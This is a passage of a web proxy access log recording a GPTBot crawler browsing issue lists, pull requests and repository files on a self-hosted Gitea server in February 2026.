+[17/Feb/2026:18:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 30096] [Gzip 12.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:18:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py?display=source" [Client 74.7.227.38] [Length 29987] [Gzip 8.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" +[17/Feb/2026:18:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:18:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:18:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:18:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:18:35:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10321] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42995] [Gzip 22.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 2038] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13311] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:18:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:18:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 70570] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:35:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:18:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:35:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:35:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:35:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f__pycache__%2fui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 20816] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:18:35:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:35:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:35:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=open&type=all" +[17/Feb/2026:18:35:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15662] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:36:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15660] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py" +[17/Feb/2026:18:36:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr 